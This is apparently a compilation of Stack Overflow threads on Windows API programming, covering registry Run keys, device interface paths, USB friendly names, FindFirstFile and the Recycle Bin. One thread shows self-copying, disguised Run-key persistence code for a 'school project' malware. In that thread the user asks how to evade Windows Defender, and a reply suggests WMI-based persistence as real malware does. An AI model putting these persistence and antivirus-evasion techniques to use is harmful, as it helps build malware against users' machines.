I am checking to see if the value "XXS" exists in the run registry
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\XXS", 0, KEY_READ | KEY_WOW64_64KEY, &hkey) == ERROR_FILE_NOT_FOUND)
{
std::cout << "KEY NOT FOUND";
LONG createStatus = RegCreateKey(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &hkey); //Creates a key
LONG status = RegSetValueEx(hkey, L"XXS", 0, REG_SZ, (LPBYTE)path, (size + 1) * sizeof(WCHAR));
}
I am not sure why this is happening and if I am using this function right. The key does exist but it says it does not. The program is 64 bit running on 64 bit pc
I think the issue here is that you do not differentiate between keys and values.
Registry keys are container objects similar to folders. Registry values are non-container objects similar to files. Keys may contain values and subkeys.
So you basically need to open/create a key and then handle the values in it.
In your case, i'd try something like this (but be aware, from the top of my head, not tested):
#define HKLM_BASE L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
HKEY hKey;
wchar_t buf[256] = { 0 };
LONG regError = RegOpenKeyEx(HKEY_LOCAL_MACHINE,HKLM_BASE,0, KEY_WOW64_64KEY | KEY_ALL_ACCESS,&hKey);
if (regError == ERROR_SUCCESS)
{
DWORD dwDataSize = sizeof(buf);
regError = RegQueryValueEx(hKey,L"XXS", NULL, NULL,(LPBYTE)&buf,&dwDataSize);
if ((regError != ERROR_SUCCESS) )
{
wchar_t *path =L"your value";
if (ERROR_SUCCESS != RegSetValueEx(hKey,L"XXS",NULL,REG_SZ,((const BYTE*)&path),wcslen (path)))
{
/* handle error */
}
} else {
/* current value in buf */
}
RegFlushKey( hKey );
RegCloseKey( hKey );
} else {
/* handle error */
}
Welcome to stack overflow! While typing this I see Morphine was just a little bit quicker. But he forgot to explain most of the the changes he made. So here are my 2 cents. The example of Morphine is fine , I won't provide another one.
I think XXS is a value (since you create a value, not a key, if it does not exist). This means you need to check if the value exist, right after you open the registry key. I also advise you to check on any error returning from the function RegOpenKeyEx, not only the ERROR_FILE_NOT_FOUND error.
Another thing I recommend is using RegCreateKeyEx instead of RegCreateKey, this since the documentation says the following:
Note This function is provided only for compatibility with 16-bit
versions of Windows. Applications should use the RegCreateKeyEx
function. However, applications that back up or restore system state
including system files and registry hives should use the Volume Shadow
Copy Service instead of the registry functions.
Last but not least, don't forget to close the keys once you do not need them anymore. You don't have to close values.
Related
For a school project, I'm developing a tiny malware that replicate itself and autorun with reg keys.
I want my program to set a reg key to autorun but when I do it Windows defender detect the RegSetValueExA function from windows.h. I also want my program to execute without administrator privilege.
My teacher told me that it's possible to avoid the detection. I have to detect when WD look at my program and tell it to stop/sleep while WD perform the scan. He also told me that it's possible to disable WD with powershell. But I don't really know how to it.
Here's the code that triggers Windows Defender:
void Victim::replicateNpersist()
{
char filename[ MAX_PATH ];
// Declaration of the directory that contain the malware
string Dir = "C:\\Users\\"+string(c_user)+"\\AppData\\Local\\WeatherChannel";
int LDir = Dir.length();
char dirPath[LDir+1];
strcpy(dirPath, Dir.c_str());
// Declaration of the object to copy
string Dest = "C:\\Users\\"+c_user+"\\AppData\\Local\\WeatherChannel\\Weather.exe";
int LDest = Dest.length();
char newLocation[LDest+1];
strcpy(newLocation,Dest.c_str());
// Creation of directory
CreateDirectoryA(dirPath, NULL);
BOOL stats=0;
DWORD size = GetModuleFileNameA(NULL, filename, MAX_PATH);
CopyFileA(filename, newLocation, stats);
// Persistence
HKEY hKey;
LPCSTR keyPath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
LONG lnRes = RegOpenKeyExA(HKEY_CURRENT_USER, keyPath,0,KEY_WRITE,&hKey);
if(lnRes == ERROR_SUCCESS) {
RegSetValueExA(hKey,"Weather.exe", 0, REG_SZ,(LPBYTE)newLocation,strlen(newLocation)+1);
}
}
Try to create your registry key in another manner. Like a lot of true malware, you can try to use StdRegProv class through WMI :
Getting value from an OUT parameter in WMI in C++
https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
I'm trying to get the "friendly name" of a plugged-in USB device. I'm using SetupDiGetDeviceRegistryProperty method with SPDRP_FRIENDLYNAME property but the method returns false and sets the error code to ERROR_INVALID_DATA, although everything works fine with other properties, such as SPDRP_DEVICEDESC or SPDRP_MFG.
I checked the registry and the Device Manager and the friendly name exists.
Does anyone have any idea?
UPDATE: What i tried so far:
GUID hidGuid;
HidD_GetHidGuid(&hidGuid);
HDEVINFO hDevInfo = SetupDiGetClassDevs(&hidGuid, 0, 0, DIGCF_PRESENT | DIGCF_INTERFACEDEVICE);
if (INVALID_HANDLE_VALUE == hDevInfo)
{
AfxMessageBox(CString("SetupDiGetClassDevs(): ")
+ _com_error(GetLastError()).ErrorMessage(), MB_ICONEXCLAMATION);
return;
}
SP_DEVINFO_DATA* pspDevInfoData =
(SP_DEVINFO_DATA*)HeapAlloc(GetProcessHeap(), 0, sizeof(SP_DEVINFO_DATA));
pspDevInfoData->cbSize = sizeof(SP_DEVINFO_DATA);
for (int i = 0; SetupDiEnumDeviceInfo(hDevInfo, i, pspDevInfoData); i++)
{
DWORD DataT;
DWORD nSize = 0;
TCHAR buf[MAX_PATH];
if (!SetupDiGetDeviceInstanceId(hDevInfo, pspDevInfoData, buf, sizeof(buf), &nSize))
{
AfxMessageBox(CString("SetupDiGetDeviceInstanceId(): ")
+ _com_error(GetLastError()).ErrorMessage(), MB_ICONEXCLAMATION);
break;
}
if (SetupDiGetDeviceRegistryProperty(hDevInfo, pspDevInfoData,
SPDRP_FRIENDLYNAME, &DataT, (PBYTE)buf, sizeof(buf), &nSize))
{
//display buf
}
else
{
if (GetLastError() == ERROR_INVALID_DATA)
{
//display ERROR_INVALID_DATA
}
if (SetupDiGetDeviceRegistryProperty(hDevInfo, pspDevInfoData, SPDRP_MFG, &DataT, (PBYTE)buf, sizeof(buf), &nSize))
{
//display buf
}
if (SetupDiGetDeviceRegistryProperty(hDevInfo, pspDevInfoData,
SPDRP_DEVICEDESC, &DataT, (PBYTE)buf, sizeof(buf), &nSize))
{
// display buf
}
}
}
Something like this. As i said, i get the device description and the device manufacturer, but not the friendly name.
Not all devices have SPDRP_FRIENDLYNAME attribute set. When that's the case, ERROR_INVALID_DATA is expected, it tells you just that.
When they don’t have it, device manager GUI uses another one for display name, SPDRP_DEVICEDESC
Maybe useful information:
In my case I had two network adapters, but the function succeeded only for the adapter that is shown as "... #2" in device manager when SPDRP_FRIENDLYNAME is used.
I could also verify that the other adapter (without the "... #2") does not have a value "FriendlyName" in it's registry data.
This behaviour seems to depend on the O/S. In may case the funtion succeeded always when SPDRP_FRIENDLYNAME is used Windows 10, but only worked for the device that was shown as "...#2" in device manager.
This issue mainly goes down to Windows 10 stopping unsigned drivers from installing, even when the 'driver' is just a .inf file that simply references a (presumably signed) windows DLL, but is there to change the "USB Serial Device" into something meaningful to humans, and recognisable by the application software. I've had to re-write 10 different projects because of this issue.
I now have to check for specific VID/PID, however it is not future proof.
I am converting a project to a UWP App, and thus have been following guidelines outlined in the MSDN post here. The existing project heavily relies on CreateFile() to communicate with connected devices.
There are many posts in SO that show us how to get a CreateFile()-accepted device path using SetupAPI's SetupDiGetDeviceInterfaceDetail() Is there an alternative way to do this using the PnP Configuration Manager API? Or an alternative, user-mode way at all?
I had some hope when I saw this example in Windows Driver Samples github, but quickly became dismayed when I saw that the function they used in the sample is ironically not intended for developer use, as noted in this MSDN page.
function GetDevicePath in general correct and can be used as is. about difference between CM_*(..) and CM_*_Ex(.., HMACHINE hMachine) - the CM_*(..) simply call CM_*_Ex(.., NULL) - so for local computer versions with and without _Ex suffix the same.
about concrete GetDevicePath code - call CM_Get_Device_Interface_List_Size and than CM_Get_Device_Interface_List only once not 100% correct - because between this two calls new device with this interface can be arrived to system and buffer size returned by CM_Get_Device_Interface_List_Size can be already not enough for CM_Get_Device_Interface_List. of course possibility of this very low, and you can ignore this. but i prefer make code maximum theoretical correct and call this in loop, until we not receive error other than CR_BUFFER_SMALL. also need understand that CM_Get_Device_Interface_List return multiple, NULL-terminated Unicode strings - so we need iterate here. in [example] always used only first returned symbolic link name of an interface instance. but it can be more than 1 or at all - 0 (empty). so better name function - GetDevicePaths - note s at the end. i be use code like this:
ULONG GetDevicePaths(LPGUID InterfaceClassGuid, PWSTR* pbuf)
{
CONFIGRET err;
ULONG len = 1024;//first try with some reasonable buffer size, without call *_List_SizeW
for(PWSTR buf;;)
{
if (!(buf = (PWSTR)LocalAlloc(0, len * sizeof(WCHAR))))
{
return ERROR_NO_SYSTEM_RESOURCES;
}
switch (err = CM_Get_Device_Interface_ListW(InterfaceClassGuid, 0, buf, len, CM_GET_DEVICE_INTERFACE_LIST_PRESENT))
{
case CR_BUFFER_SMALL:
err = CM_Get_Device_Interface_List_SizeW(&len, InterfaceClassGuid, 0, CM_GET_DEVICE_INTERFACE_LIST_PRESENT);
default:
LocalFree(buf);
if (err)
{
return CM_MapCrToWin32Err(err, ERROR_UNIDENTIFIED_ERROR);
}
continue;
case CR_SUCCESS:
*pbuf = buf;
return NOERROR;
}
}
}
and usage example:
void example()
{
PWSTR buf, sz;
if (NOERROR == GetDevicePaths((GUID*)&GUID_DEVINTERFACE_VOLUME, &buf))
{
sz = buf;
while (*sz)
{
DbgPrint("%S\n", sz);
HANDLE hFile = CreateFile(sz, FILE_GENERIC_READ, FILE_SHARE_VALID_FLAGS, 0, OPEN_EXISTING, 0, 0);
if (hFile != INVALID_HANDLE_VALUE)
{
// do something
CloseHandle(hFile);
}
sz += 1 + wcslen(sz);
}
LocalFree(buf);
}
}
so we must not simply use in returned DevicePathS (sz) only first string, but iterate it
while (*sz)
{
// use sz
sz += 1 + wcslen(sz);
}
I got a valid Device Path to a USB Hub Device, and used it successfully to get various device descriptors by sending some IOCTLs, by using the function I posted in my own answer to another question
I'm reporting the same function below:
This function returns a list of NULL-terminated Device Paths (that's what we get from CM_Get_Device_Interface_List())
You need to pass it the DEVINST, and the wanted interface GUID.
Since both the DEVINST and interface GUID are specified, it is highly likely that CM_Get_Device_Interface_List() will return a single Device Path for that interface, but technically you should be prepared to get more than one result.
It is responsibility of the caller to delete[] the returned list if the function returns successfully (return code 0)
int GetDevInstInterfaces(DEVINST dev, LPGUID interfaceGUID, wchar_t**outIfaces, ULONG* outIfacesLen)
{
CONFIGRET cres;
if (!outIfaces)
return -1;
if (!outIfacesLen)
return -2;
// Get System Device ID
WCHAR sysDeviceID[256];
cres = CM_Get_Device_ID(dev, sysDeviceID, sizeof(sysDeviceID) / sizeof(sysDeviceID[0]), 0);
if (cres != CR_SUCCESS)
return -11;
// Get list size
ULONG ifaceListSize = 0;
cres = CM_Get_Device_Interface_List_Size(&ifaceListSize, interfaceGUID, sysDeviceID, CM_GET_DEVICE_INTERFACE_LIST_PRESENT);
if (cres != CR_SUCCESS)
return -12;
// Allocate memory for the list
wchar_t* ifaceList = new wchar_t[ifaceListSize];
// Populate the list
cres = CM_Get_Device_Interface_List(interfaceGUID, sysDeviceID, ifaceList, ifaceListSize, CM_GET_DEVICE_INTERFACE_LIST_PRESENT);
if (cres != CR_SUCCESS) {
delete[] ifaceList;
return -13;
}
// Return list
*outIfaces = ifaceList;
*outIfacesLen = ifaceListSize;
return 0;
}
Please note that, as RbMm already said in his answer, you may get a CR_BUFFER_SMALL error from the last CM_Get_Device_Interface_List() call, since the device list may have been changed in the time between the CM_Get_Device_Interface_List_Size() and CM_Get_Device_Interface_List() calls.
There is a short example:
WIN32_FIND_DATA fd;
HANDLE h = FindFirstFile(L"C:", &fd);
if (h == INVALID_HANDLE_VALUE)
{
wprintf(L"Err = %d\n", GetLastError());
return 1;
}
do {
std::wstring fullPath(fd.cFileName);
wprintf(L"FullPath = %s\n", fullPath.c_str());
} while (FindNextFile(h, &fd));
FindClose(h);
I'm confused since
HANDLE h = FindFirstFile(L"C:", &fd); // OK
HANDLE h = FindFirstFile(L"E:", &fd); // INVALID_HANDLE_VALUE
HANDLE h = FindFirstFile(L"F:", &fd); // INVALID_HANDLE_VALUE
But E and F are real, existing volumes.
I do so because I need all information from the WIN32_FIND_DATA structure which will be passed to the kernel mode.
This question seems to be based on a misunderstanding. You say:
I do not want to examine the files and directories in "E:*", I want to get information about this volume.
and
I need all information from the WIN32_FIND_DATA structure.
Well, the find data information is meaningful for file and directory objects, but not for volume objects.
You'll need to use some other means to obtain volume information. Perhaps GetVolumeInformation, WMI, or maybe something else depending on your needs.
I think you have to put "E:\\*" not only the volume. Or you want to find the volume entry? Also, it is good to clean fd structure memset( &fd, 0, sizeof fd ).
On my machine (Win7 x64) FindFirstFile(L"C:", &fd) returns -1 (C: is system disc), GetLastError() is 2 (i.e. "file not found").
I've checked how FindFirstFile is working. It converts winapi like path to nt path at some stage using RtlDosPathNameToRelativeNtPathName_U and then checks whether PartName is empty or not.
If it's empty it returns mentioned error code.
if it's a mask, it continues and enumerates entries that match: that's why FindFirstFile(L"C:\\*.*", &fd) returns valid handle. Thus if you need to enumerate all files in C: using form C:\\*.*.
In case if you need a volume information use special function GetVolumeInformation.
am facing two problems one big problem and one small problem :)
problem # 1 : am unable to read Machine ID from below path ... i get my processor name like intel i7 #2.2ghz like that , i do not know why , i should get machine id , long integer string but i not get it , so please help
reg_path="SOFTWARE\\Microsoft\\Cryptography";
rvalue="MachineGuid"; // data value
my registery reading function
string read_reg_sz(char rpath[],char rdata[]) // read registery Loaction
{
REGSAM flag = KEY_WOW64_32KEY or KEY_WOW64_64KEY;
char buffer[MAX];
char Buffer[MAX];
DWORD BufSize = _MAX_PATH;
char dwMHz[MAX];
DWORD dataType = REG_SZ;
HKEY hKey;
long lError = RegOpenKeyEx(HKEY_LOCAL_MACHINE,rpath,NULL, KEY_READ | KEY_WRITE | flag,&hKey);
if(lError != ERROR_SUCCESS)
{// if the key is not found, tell the user why:
FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
lError,
0,
Buffer,
_MAX_PATH,
0);
cout<<"\n reg erro : "<<Buffer;
return "N/A";
}
// query the key:
RegQueryValueEx(hKey,rdata,NULL,&dataType,(LPBYTE) &dwMHz,&BufSize);
RegCloseKey(hKey); // close open handle ....
cout<<"\n reg data read: "<<dwMHz;
return dwMHz;
}
second problem :
currently i have function which can totally clean recycle bin :)
SHEmptyRecycleBin(NULL, NULL, SHERB_NOCONFIRMATION | SHERB_NOPROGRESSUI | SHERB_NOSOUND);
but i want to delete single file from recycle bin like passing filename
You should really post it as two different questions, but I'll try to answer both.
1. Get MachineGuid
I think your issue is in this line:
// query the key:
RegQueryValueEx(hKey,rdata,NULL,&dataType,(LPBYTE) &dwMHz,&BufSize);
You should change it to:
// query the key:
RegQueryValueEx(hKey,rvalue,NULL,&dataType,(LPBYTE) &dwMHz,&BufSize);
By the way, dhMHz does not sound like right variable name - change it to reflect reality.
Also, you should have this:
DWORD BufSize = sizeof(Buffer) - 1;
And, it would be nice to NOT have both buffer and Buffer variables.
2. Delete one file from recycle bin
According to Microsoft documentation on SHFileOperation, you should just use DeleteFile on filename like C:\$Recycle.Bin\file.txt:
When used to delete a file, SHFileOperation permanently deletes the file unless you set the FOF_ALLOWUNDO flag in the fFlags member of the SHFILEOPSTRUCT structure pointed to by lpFileOp. Setting that flag sends the file to the Recycle Bin. If you want to simply delete a file and guarantee that it is not placed in the Recycle Bin, use DeleteFile.
To delete a single file from the Recycle Bin, use SHGetSpecialFolderLocation(CSIDL_BITBUCKET) or SHGetKnownFolderIDList(FOLDERID_RecycleBinFolder) to get the absolute PIDL of the Recycle Bin, then use SHBindToObject() to get the IShellFolder interface for it and call its ParseDisplayName() method to convert the desired filename into a relative PIDL, then use SHBindToObject() to get the IContextMenu interface for the file and call its InvokeCommand() method to execute the file's "delete" verb.